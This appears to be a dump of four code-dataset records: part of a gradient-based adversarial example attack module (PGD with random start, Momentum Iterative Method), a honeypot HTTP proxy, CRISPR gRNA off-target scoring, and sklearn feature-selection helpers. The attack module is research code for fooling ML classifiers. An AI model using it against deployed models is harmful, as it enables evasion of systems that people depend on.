`numpy.ndarray`, must not be passed if `a` is\r\n an :class:`Adversarial` instance.\r\n unpack : bool\r\n If true, returns the adversarial input, otherwise returns\r\n the Adversarial object.\r\n binary_search : bool or int\r\n Whether to perform a binary search over epsilon and stepsize,\r\n keeping their ratio constant and using their values to start\r\n the search. 
If False, hyperparameters are not optimized.\r\n Can also be an integer, specifying the number of binary\r\n search steps (default 20).\r\n epsilon : float\r\n Limit on the perturbation size; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n stepsize : float\r\n Step size for gradient descent; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n iterations : int\r\n Number of iterations for each gradient descent run.\r\n random_start : bool\r\n Start the attack from a random point rather than from the\r\n original input.\r\n return_early : bool\r\n Whether an individual gradient descent run should stop as\r\n soon as an adversarial is found.\r\n \"\"\"\r\n\r\n a = input_or_adv\r\n del input_or_adv\r\n del label\r\n del unpack\r\n\r\n assert epsilon > 0\r\n\r\n self._run(a, epsilon, stepsize, iterations,\r\n random_start, return_early)\r\n\r\n\r\nRandomProjectedGradientDescent = RandomStartProjectedGradientDescentAttack\r\nRandomPGD = RandomProjectedGradientDescent\r\n\r\n\r\nclass MomentumIterativeAttack(\r\n LinfinityClippingMixin,\r\n LinfinityDistanceCheckMixin,\r\n IterativeProjectedGradientBaseAttack):\r\n\r\n \"\"\"The Momentum Iterative Method attack\r\n introduced in [1]_. It's like the Basic\r\n Iterative Method or Projected Gradient\r\n Descent except that it uses momentum.\r\n\r\n References\r\n ----------\r\n .. [1] Yinpeng Dong, Fangzhou Liao, Tianyu Pang, Hang Su,\r\n Jun Zhu, Xiaolin Hu, Jianguo Li, \"Boosting Adversarial\r\n Attacks with Momentum\",\r\n https://arxiv.org/abs/1710.06081\r\n\r\n \"\"\"\r\n\r\n def _gradient(self, a, x, class_, strict=True):\r\n # get current gradient\r\n gradient = a.gradient_one(x, class_, strict=strict)\r\n gradient = gradient / max(1e-12, np.mean(np.abs(gradient)))\r\n\r\n # combine with history of gradient as new history\r\n self._momentum_history = self._decay_factor * self._momentum_history + gradient\r\n\r\n # use history\r\n gradient = self._momentum_history\r\n gradient = np.sign(gradient)\r\n min_, max_ = a.bounds()\r\n gradient = (max_ - min_) * gradient\r\n return gradient\r\n\r\n def _run_one(self, *args, **kwargs):\r\n # reset momentum history every time we restart\r\n # gradient descent\r\n self._momentum_history = 0\r\n return super(MomentumIterativeAttack, self)._run_one(*args, **kwargs)\r\n\r\n @call_decorator\r\n def __call__(self, input_or_adv, label=None, unpack=True,\r\n epsilon=0.3,\r\n stepsize=0.06,\r\n iterations=10,\r\n decay_factor=1.0,\r\n random_start=False,\r\n return_early=True):\r\n \"\"\"Momentum-based iterative gradient attack known as\r\n Momentum Iterative Method.\r\n\r\n Parameters\r\n ----------\r\n input_or_adv : `numpy.ndarray` or :class:`Adversarial`\r\n The original, unperturbed input as a `numpy.ndarray` or\r\n an :class:`Adversarial` instance.\r\n label : int\r\n The reference label of the original input. Must be passed\r\n if `a` is a `numpy.ndarray`, must not be passed if `a` is\r\n an :class:`Adversarial` instance.\r\n unpack : bool\r\n If true, returns the adversarial input, otherwise returns\r\n the Adversarial object.\r\n binary_search : bool\r\n Whether to perform a binary search over epsilon and stepsize,\r\n keeping their ratio constant and using their values to start\r\n the search. 
If False, hyperparameters are not optimized.\r\n Can also be an integer, specifying the number of binary\r\n search steps (default 20).\r\n epsilon : float\r\n Limit on the perturbation size; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n stepsize : float\r\n Step size for gradient descent; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n iterations : int\r\n Number of iterations for each gradient descent run.\r\n decay_factor : float\r\n Decay factor used by the momentum term.\r\n random_start : bool\r\n Start the attack from a random point rather than from the\r\n original input.\r\n return_early : bool\r\n Whether an individual gradient descent run should stop as\r\n soon as an adversarial is found.\r\n \"\"\"\r\n a = input_or_adv\r\n del input_or_adv\r\n del label\r\n del unpack\r\n\r\n assert epsilon > 0\r\n\r\n self._decay_factor = decay_factor\r\n\r\n self._run(a, epsilon, stepsize, iterations,\r\n random_start, return_early)\r\n\r\n\r\nMomentumIterativeMethod = MomentumIterativeAttack\r\n", "repo_name": "shiyuchengTJU/CISA", "sub_path": "my_attacks/gaussian_iterative_projected_gradient.py", "file_name": "gaussian_iterative_projected_gradient.py", "file_ext": "py", "file_size_in_byte": 35585, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.sum", "line_number": 18, "usage_type": "call"}, {"api_name": "foolbox.attacks.base.Attack", "line_number": 56, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 66, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 70, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 74, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 163, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 230, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 230, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 265, "usage_type": "call"}, {"api_name": 
"logging.getLogger", "line_number": 273, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 273, "usage_type": "attribute"}, {"api_name": "foolbox.utils.crossentropy", "line_number": 275, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 276, "usage_type": "call"}, {"api_name": "foolbox.utils.crossentropy", "line_number": 278, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.sign", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 363, "usage_type": "call"}, {"api_name": "foolbox.distances.Linfinity", "line_number": 374, "usage_type": "attribute"}, {"api_name": "foolbox.distances", "line_number": 374, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 375, "usage_type": "call"}, {"api_name": "foolbox.distances.MAE", "line_number": 384, "usage_type": "attribute"}, {"api_name": "foolbox.distances", "line_number": 384, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 385, "usage_type": "call"}, {"api_name": "foolbox.distances.MSE", "line_number": 394, "usage_type": "attribute"}, {"api_name": "foolbox.distances", "line_number": 394, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 395, "usage_type": "call"}, {"api_name": "foolbox.attacks.base.call_decorator", "line_number": 423, "usage_type": "name"}, {"api_name": "foolbox.attacks.base.call_decorator", "line_number": 494, "usage_type": "name"}, {"api_name": "foolbox.attacks.base.call_decorator", "line_number": 564, "usage_type": "name"}, {"api_name": "foolbox.attacks.base.call_decorator", "line_number": 654, "usage_type": "name"}, {"api_name": "foolbox.attacks.base.call_decorator", "line_number": 735, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 818, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 818, "usage_type": "call"}, {"api_name": "numpy.sign", "line_number": 825, "usage_type": "call"}, {"api_name": "foolbox.attacks.base.call_decorator", "line_number": 836, "usage_type": "name"}]} +{"seq_id": "15579456485", "text": "\"\"\"\n// -------------------------------------------------------------\n// author Giga\n// project qeeqbox/honeypots\n// email gigaqeeq@gmail.com\n// description app.py (CLI)\n// licensee AGPL-3.0\n// -------------------------------------------------------------\n// contributors list qeeqbox/social-analyzer/graphs/contributors\n// -------------------------------------------------------------\n\"\"\"\n\nfrom uuid import uuid4\nfrom honeypots.helper import close_port_wrapper, get_free_port, kill_server_wrapper, server_arguments, setup_logger, disable_logger\nfrom os import path\nfrom email.parser import BytesParser\nfrom subprocess import Popen\nfrom requests import get\nfrom twisted.python import log as 
tlog\nfrom twisted.internet.protocol import Protocol, ClientFactory, Factory\nfrom twisted.internet import reactor\nfrom dns.resolver import query as dsnquery\nfrom warnings import filterwarnings\nfilterwarnings(action='ignore', module='.*OpenSSL.*')\n\n\nclass QHTTPProxyServer():\n def __init__(self, ip=None, port=None, mocking=None, config=''):\n self.ip = ip or '0.0.0.0'\n self.port = port or 8080\n self.mocking = mocking or ''\n self.process = None\n self.uuid = 'honeypotslogger'\n self.config = config\n if config:\n self.logs = setup_logger(self.uuid, config)\n else:\n self.logs = setup_logger(self.uuid, None)\n disable_logger(1, tlog)\n\n def http_proxy_server_main(self):\n _q_s = self\n\n class CustomProtocolParent(Protocol):\n\n def __init__(self):\n self.buffer = None\n self.client = None\n\n def resolve_domain(self, request_string):\n try:\n _, parsed_request = request_string.split(b'\\r\\n', 1)\n headers = BytesParser().parsebytes(parsed_request)\n host = headers[\"host\"].split(\":\")\n _q_s.logs.info({'server': 'http_proxy_server', 'action': 'query', 'ip': self.transport.getPeer(\n ).host, 'port': self.transport.getPeer().port, 'payload': host[0]})\n # return \"127.0.0.1\"\n return dsnquery(host[0], 'A')[0].address\n except Exception as e:\n _q_s.logs.error([\"errors\", {\n 'server': 'http_proxy_server', 'error': 'resolve_domain', \"type\": \"error -> \" + repr(e)}])\n return None\n\n def dataReceived(self, data):\n _q_s.logs.info({'server': 'http_proxy_server', 'action': 'connection',\n 'ip': self.transport.getPeer().host, 'port': self.transport.getPeer().port})\n try:\n ip = self.resolve_domain(data)\n if ip:\n factory = ClientFactory()\n factory.CustomProtocolParent_ = self\n factory.protocol = CustomProtocolChild\n reactor.connectTCP(ip, 80, factory)\n else:\n self.transport.loseConnection()\n\n if self.client:\n self.client.write(data)\n else:\n self.buffer = data\n except BaseException:\n pass\n\n def write(self, data):\n self.transport.write(data)\n\n class CustomProtocolChild(Protocol):\n def connectionMade(self):\n self.write(self.factory.CustomProtocolParent_.buffer)\n\n def dataReceived(self, data):\n self.factory.CustomProtocolParent_.write(data)\n\n def write(self, data):\n self.transport.write(data)\n\n factory = Factory()\n factory.protocol = CustomProtocolParent\n reactor.listenTCP(port=self.port, factory=factory, interface=self.ip)\n reactor.run()\n\n def run_server(self, process=False, auto=False):\n if process:\n if auto:\n port = get_free_port()\n if port > 0:\n self.port = port\n self.process = Popen(['python3', path.realpath(__file__), '--custom', '--ip', str(self.ip), '--port', str(\n self.port), '--mocking', str(self.mocking), '--config', str(self.config), '--uuid', str(self.uuid)])\n if self.process.poll() is None:\n self.logs.info({'server': 'http_proxy_server', 'action': 'process',\n 'status': 'success', 'ip': self.ip, 'port': self.port})\n else:\n self.logs.info({'server': 'http_proxy_server', 'action': 'process',\n 'status': 'error', 'ip': self.ip, 'port': self.port})\n else:\n self.logs.info({'server': 'http_proxy_server', 'action': 'setup',\n 'status': 'error', 'ip': self.ip, 'port': self.port})\n elif self.close_port() and self.kill_server():\n self.process = Popen(['python3', path.realpath(__file__), '--custom', '--ip', str(self.ip), '--port', str(\n self.port), '--mocking', str(self.mocking), '--config', str(self.config), '--uuid', str(self.uuid)])\n if self.process.poll() is None:\n self.logs.info({'server': 'http_proxy_server', 'action': 
'process',\n 'status': 'success', 'ip': self.ip, 'port': self.port})\n else:\n self.logs.info({'server': 'http_proxy_server', 'action': 'process',\n 'status': 'error', 'ip': self.ip, 'port': self.port})\n else:\n self.http_proxy_server_main()\n\n def test_server(self, ip=None, port=None, domain=None):\n try:\n _ip = ip or self.ip\n _port = port or self.port\n _domain = domain or \"http://yahoo.com\"\n get(_domain, proxies={\n \"http\": 'http://{}:{}'.format(_ip, _port)}).text.encode('ascii', 'ignore')\n except BaseException:\n pass\n\n def close_port(self):\n ret = close_port_wrapper(\n 'http_proxy_server', self.ip, self.port, self.logs)\n return ret\n\n def kill_server(self):\n ret = kill_server_wrapper('http_proxy_server', self.uuid, self.process)\n return ret\n\n\nif __name__ == '__main__':\n parsed = server_arguments()\n if parsed.docker or parsed.aws or parsed.custom:\n qhttpproxyserver = QHTTPProxyServer(\n ip=parsed.ip, port=parsed.port, mocking=parsed.mocking, config=parsed.config)\n qhttpproxyserver.run_server()\n", "repo_name": "L3thal14/Pandora", "sub_path": "honeypots/http_proxy_server.py", "file_name": "http_proxy_server.py", "file_ext": "py", "file_size_in_byte": 6757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 24, "usage_type": "call"}, {"api_name": "honeypots.helper.setup_logger", "line_number": 36, "usage_type": "call"}, {"api_name": "honeypots.helper.setup_logger", "line_number": 38, "usage_type": "call"}, {"api_name": "honeypots.helper.disable_logger", "line_number": 39, "usage_type": "call"}, {"api_name": "twisted.python.log", "line_number": 39, "usage_type": "argument"}, {"api_name": "twisted.internet.protocol.Protocol", "line_number": 44, "usage_type": "name"}, {"api_name": "email.parser.BytesParser", "line_number": 53, "usage_type": "call"}, {"api_name": "dns.resolver.query", "line_number": 58, "usage_type": "call"}, {"api_name": "twisted.internet.protocol.ClientFactory", "line_number": 70, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.connectTCP", "line_number": 73, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 73, "usage_type": "name"}, {"api_name": "twisted.internet.protocol.Protocol", "line_number": 87, "usage_type": "name"}, {"api_name": "twisted.internet.protocol.Factory", "line_number": 97, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.listenTCP", "line_number": 99, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 99, "usage_type": "name"}, {"api_name": "twisted.internet.reactor.run", "line_number": 100, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 100, "usage_type": "name"}, {"api_name": "honeypots.helper.get_free_port", "line_number": 105, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 136, "usage_type": "call"}, {"api_name": "honeypots.helper.close_port_wrapper", "line_number": 142, "usage_type": "call"}, {"api_name": 
"honeypots.helper.kill_server_wrapper", "line_number": 147, "usage_type": "call"}, {"api_name": "honeypots.helper.server_arguments", "line_number": 152, "usage_type": "call"}]} +{"seq_id": "41405702640", "text": "# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n# Author: Yixin Guo, Ziwei Xue\n#\n# ------------------------- #\n# Python Modules\n# ------------------------- #\n\nimport numpy as np\nimport sys\nfrom functools import partial\nfrom collections import Counter\n\n# ------------------------- #\n# Package Python Modules\n# ------------------------- #\n\nfrom .dbutils import *\nfrom .grna_query import *\n\noff_target_penalty = {\"diffTE\":.06, \"sameTE\":.03, 'exon':.09, 'intron':.09, 'promoter-TSS':.09, \"intergenic\": .0,}\nmm_penalty = {'0': .004, '3': .001, '2':.002, '1':.003}\n\ndef map_annotation(te1, te2, x):\n anno = x[0].split('(')[0]\n if te2:\n if anno == \"TE\":\n if x[2] == te2:\n return (0,\"sameTEdup\",x[0].split('(')[1].split(';')[0])\n anno = x[1]\n if anno == te1:\n return (off_target_penalty[\"sameTE\"], \"sameTE\", x[0].split('(')[1].split(';')[0])\n else:\n return (off_target_penalty[\"diffTE\"], \"diffTE\", x[0].split('(')[1].split(';')[0])\n else:\n return (off_target_penalty[anno], anno, anno)\n else:\n if anno == \"TE\":\n if anno == te1:\n return (off_target_penalty[\"sameTE\"], \"sameTE\", x[0].split('(')[1].split(';')[0])\n else:\n return (off_target_penalty[\"diffTE\"], \"diffTE\", x[0].split('(')[1].split(';')[0])\n else:\n return (off_target_penalty[anno], anno, anno)\n\n\ndef calculate_offtarget_score(gids_mms, self_te_class, self_te_dup=None):\n result = {}\n par_func = partial(map_annotation, self_te_class, self_te_dup)\n for gid, mm in gids_mms.items():\n score = 0\n result[gid] = {}\n result[gid][\"mm0\"], result[gid][\"mm1\"], result[gid][\"mm2\"], result[gid][\"mm3\"] = {},{},{},{}\n result[gid][\"mm0\"][\"brief\"], result[gid][\"mm1\"][\"brief\"], result[gid][\"mm2\"][\"brief\"], result[gid][\"mm3\"][\"brief\"] = [],[],[],[]\n result[gid][\"mm0\"][\"detail\"], result[gid][\"mm1\"][\"detail\"], result[gid][\"mm2\"][\"detail\"], result[gid][\"mm3\"][\"detail\"] = [],[],[],[]\n\n for i in [\"mm0\", \"mm1\", \"mm2\", \"mm3\"]:\n annotation = list(map(lambda x:(x[1],x[2],x[3]), mm[i]))\n annotation = list(map(par_func, annotation))\n score += sum(list(map(lambda x:x[0], annotation))) * mm_penalty['0']\n result[gid][i][\"brief\"] = list(map(lambda x:x[1], annotation))\n result[gid][i][\"detail\"] = list(map(lambda x:x[2], annotation))\n\n result[gid][i][\"brief\"] = dict(Counter(result[gid][i][\"brief\"]))\n result[gid][i][\"detail\"] = dict(Counter(result[gid][i][\"detail\"]))\n\n\n gids_mms[gid][i] = {}\n\n gids_mms[gid][i][\"class\"] = result[gid][i][\"brief\"]\n gids_mms[gid][i][\"raw\"] = result[gid][i][\"detail\"]\n\n gids_mms[gid][\"score\"] = gids_mms[gid][\"gscore\"] -score\n \n return gids_mms\n", "repo_name": "WanluLiuLab/CRISPRTE", "sub_path": "src/grna_mismatch_scoring.py", "file_name": "grna_mismatch_scoring.py", "file_ext": "py", "file_size_in_byte": 2889, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "functools.partial", "line_number": 49, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 64, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "17344400284", "text": "from sklearn.feature_selection import VarianceThreshold\nfrom sklearn.feature_selection import 
chi2\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import f_classif\nfrom sklearn.feature_selection import f_regression\nfrom sklearn.feature_selection import mutual_info_classif\nfrom sklearn.feature_selection import mutual_info_regression\nimport heapq\nfrom scipy.stats import pearsonr\nfrom scipy.stats import spearmanr\nfrom sklearn.model_selection import KFold\nfrom sklearn.feature_selection import RFE\nfrom sklearn.feature_selection import RFECV\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.ensemble import GradientBoostingClassifier, GradientBoostingRegressor\n\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.linear_model import Lasso\n\n\ndef variance_threshold(X, threshold, get_feature_importance=False):\n '''\n 方差选择\n 使用方差选择法,先要计算各个特征的方差,然后根据阈值,选择方差大于阈值的特征。\n 只需修改参数threshold, 将筛选出方差大于threshold的变量。\n 这个方法的特征权重用方差大小表示,可以认为方差越大,特征越好\n '''\n model = VarianceThreshold(threshold)\n model.fit(X)\n features = X.columns[model.get_support().tolist()]\n if not get_feature_importance:\n return features\n else:\n variance = model.variances_\n return features, variance\n\n\ndef chi_square(X, y, k, get_feature_importance=False):\n '''\n 卡方选择,用于分类任务\n 根据特征与目标的独立性选择特征\n 只需修改参数k, 表示保留的变量个数\n 这个方法的特征权重用卡方值表示,可以认为卡方值越大,特征越好\n '''\n model = SelectKBest(chi2, k)\n model.fit(X, y)\n features = X.columns[model.get_support().tolist()]\n if not get_feature_importance:\n return features\n else:\n chi2_value = model.scores_\n return features, chi2_value\n\n\ndef f_stat(X, y, k, task_type=\"clf\", get_feature_importance=False):\n '''\n F检验(ANOVA选择),\n 参数k, 表示保留的变量个数\n 参数task_type,任务类型,可以选择分类(clf)和回归(reg)\n 这个方法的特征权重用F值表示,可以认为F值越大,特征越好\n '''\n if task_type == \"clf\":\n model = SelectKBest(f_classif, k)\n model.fit(X, y)\n selected_features = X.columns[model.get_support().tolist()]\n\n elif task_type == \"reg\":\n model = SelectKBest(f_regression, k)\n model.fit(X, y)\n selected_features = X.columns[model.get_support().tolist()]\n else:\n raise Exception(\"Unknown task type\")\n\n if not get_feature_importance:\n return selected_features\n else:\n f_value = model.scores_\n return selected_features, f_value\n\n\ndef mutual_info(X, y, k, task_type=\"clf\", get_feature_importance=False):\n '''\n 互信息法\n 参数k, 表示保留的变量个数\n 参数task_type,任务类型,可以选择分类(clf)和回归(reg)\n 这个方法的特征权重用互信息值表示,可以认为互信息值越大,特征越好\n '''\n if task_type == \"clf\":\n model = SelectKBest(mutual_info_classif, k)\n model.fit(X, y)\n selected_features = X.columns[model.get_support().tolist()]\n elif task_type == \"reg\":\n model = SelectKBest(mutual_info_regression, k)\n model.fit(X, y)\n selected_features = X.columns[model.get_support().tolist()]\n else:\n raise Exception(\"Unknown task type\")\n\n if not get_feature_importance:\n return selected_features\n else:\n mi = model.scores_\n return selected_features, mi\n\n\ndef correlation(X, y, k, method=\"pearsonr\", get_feature_importance=False):\n '''\n 相关系数法\n 参数method,可以选择“pearsonr”或“spearmanr\"\n 参数k, 表示保留的变量个数\n 这个方法的特征权重用相关系数表示,可以认为相关系数越大,特征越好\n '''\n rs = []\n for i in range(X.shape[1]):\n if method==\"pearsonr\":\n r, p = pearsonr(X.iloc[:, i], y)\n elif method==\"spearmanr\":\n r, p = spearmanr(X.iloc[:, i], y)\n else:\n raise Exception(\"Unrecognized correlation method\")\n rs.append(r)\n ind = list(map(rs.index, heapq.nlargest(k, rs)))\n 
    selected_features = X.columns[ind]\n    if not get_feature_importance:\n        return selected_features\n    else:\n        coefficients = [rs[i] for i in ind]\n        return selected_features, coefficients\n\n\ndef rfe(X, y, k, mode=\"LR\", get_feature_importance=False):\n    '''\n    Wrapper method.\n    RFE.\n    Parameter k is the number of variables to keep.\n    Parameter mode is the estimator used inside the wrapper; options:\n    1. \"LR\", default, logistic regression\n    2. \"SVC\", linear-kernel SVM\n    3. \"DT\", \"decision tree\"\n    4. \"DTR\", \"decision tree regressor\"\n    5. \"RF\", \"random forest\"\n    6. \"RFR\", \"random forest regressor\"\n    7. \"GB\", \"gradient boosting\"\n    8. \"GBR\", \"gradient boosting regressor\"\n    For regression tasks choose DTR, RFR or GBR. Each estimator uses its default parameters; to change them, see the sklearn documentation.\n    '''\n    if mode == \"LR\":\n        estimator = LogisticRegression()\n    elif mode == \"SVC\":\n        estimator = SVC(kernel=\"linear\", C=1)\n    elif mode == \"DT\":\n        estimator = DecisionTreeClassifier()\n    elif mode == \"RF\":\n        estimator = RandomForestClassifier()\n    elif mode == \"GB\":\n        estimator = GradientBoostingClassifier()\n    elif mode == \"DTR\":\n        estimator = DecisionTreeRegressor()\n    elif mode == \"RFR\":\n        estimator = RandomForestRegressor()\n    elif mode == \"GBR\":\n        estimator = GradientBoostingRegressor()\n    else:\n        raise Exception(\"Unrecognized estimator\")\n\n    model = RFE(estimator=estimator, n_features_to_select=k)\n    model.fit(X, y)\n    selected_features = X.columns[model.get_support().tolist()]\n    if not get_feature_importance:\n        return selected_features\n    else:\n        estimator = model.estimator_\n        if mode in ['LR', 'SVC']:\n            feature_importance = estimator.coef_\n        elif mode in ['DT', 'DTR', 'RF', 'RFR', 'GB', 'GBR']:\n            feature_importance = estimator.feature_importances_\n        return selected_features, feature_importance\n\n\n\ndef rfecv(X, y, mode=\"LR\", n_splits=5, random_state=1, scoring=\"neg_mean_squared_error\"):\n    '''\n    Wrapper method.\n    RFECV.\n    Automatically returns the best features via cross-validation, so no feature count has to be specified, but it takes longer to run.\n    Parameter mode is the estimator used inside the wrapper; options:\n    1. \"LR\", default, logistic regression\n    2. \"SVC\", linear-kernel SVM\n    3. \"DT\", \"decision tree\"\n    4. \"DTR\", \"decision tree regressor\"\n    5. \"RF\", \"random forest\"\n    6. \"RFR\", \"random forest regressor\"\n    7. \"GB\", \"gradient boosting\"\n    8. \"GBR\", \"gradient boosting regressor\"\n    For regression tasks choose DTR, RFR or GBR. Each estimator uses its default parameters; to change them, see the sklearn documentation.\n    n_splits: number of cross-validation folds.\n    random_state: seed used to split the data in cross-validation.\n    scoring: evaluation metric used in cross-validation.\n    '''\n    if mode == \"LR\":\n        estimator = LogisticRegression()\n    elif mode == \"SVC\":\n        estimator = SVC(kernel=\"linear\", C=1)\n    elif mode == \"DT\":\n        estimator = DecisionTreeClassifier()\n    elif mode == \"RF\":\n        estimator = RandomForestClassifier()\n    elif mode == \"GB\":\n        estimator = GradientBoostingClassifier()\n    elif mode == \"DTR\":\n        estimator = DecisionTreeRegressor()\n    elif mode == \"RFR\":\n        estimator = RandomForestRegressor()\n    elif mode == \"GBR\":\n        estimator = GradientBoostingRegressor()\n    else:\n        raise Exception(\"Unrecognized estimator\")\n\n    model = RFECV(estimator=estimator, cv=KFold(n_splits=n_splits, shuffle=True, random_state=random_state), scoring=scoring)\n    model.fit(X, y)\n    return X.columns[model.get_support().tolist()]\n\n\ndef embedding(X, y, mode = \"LR\"):\n    '''\n    Embedding method.\n    Selects the best features automatically by training a model; no feature count has to be specified.\n    Parameter mode is the model used for embedding; options:\n    1. \"LR\", default, logistic regression\n    2. \"Lasso\"\n    3. \"RF\", \"random forest\"\n    4. \"RFR\", \"random forest regressor\"\n    5. \"GB\", \"gradient boosting\"\n    6. \"GBR\", \"gradient boosting regressor\"
\n    For regression tasks choose Lasso, RFR or GBR. Each estimator uses its default parameters; to change them, see the sklearn documentation.\n    '''\n    if mode == \"LR\":\n        model = SelectFromModel(LogisticRegression())\n    elif mode == \"GBR\":\n        model = SelectFromModel(GradientBoostingRegressor())\n    elif mode == \"GB\":\n        model = SelectFromModel(GradientBoostingClassifier())\n    elif mode == \"RFR\":\n        model = SelectFromModel(RandomForestRegressor())\n    elif mode == \"Lasso\":\n        model = SelectFromModel(Lasso())\n    elif mode == \"RF\":\n        model = SelectFromModel(RandomForestClassifier())\n    else:\n        raise Exception(\"Unrecognized model\")\n    model.fit(X, y)\n    return X.columns[model.get_support().tolist()]\n\n\n\n", "repo_name": "nainai123/tools", "sub_path": "python/utils/feature_selection.py", "file_name": "feature_selection.py", "file_ext": "py", "file_size_in_byte": 9479, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sklearn.feature_selection.VarianceThreshold", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectKBest", "line_number": 49, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.chi2", "line_number": 49, "usage_type": "argument"}, {"api_name": "sklearn.feature_selection.SelectKBest", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.f_classif", "line_number": 67, "usage_type": "argument"}, {"api_name": "sklearn.feature_selection.SelectKBest", "line_number": 72, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.f_regression", "line_number": 72, "usage_type": "argument"}, {"api_name": "sklearn.feature_selection.SelectKBest", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.mutual_info_classif", "line_number": 93, "usage_type": "argument"}, {"api_name": "sklearn.feature_selection.SelectKBest", "line_number": 97, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.mutual_info_regression", "line_number": 97, "usage_type": "argument"}, {"api_name": "scipy.stats.pearsonr", "line_number": 120, "usage_type": "call"}, {"api_name": "scipy.stats.spearmanr", "line_number": 122, "usage_type": "call"}, {"api_name": "heapq.nlargest", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 154, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 156, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 158, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 160, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 162, "usage_type": "call"}, {"api_name": 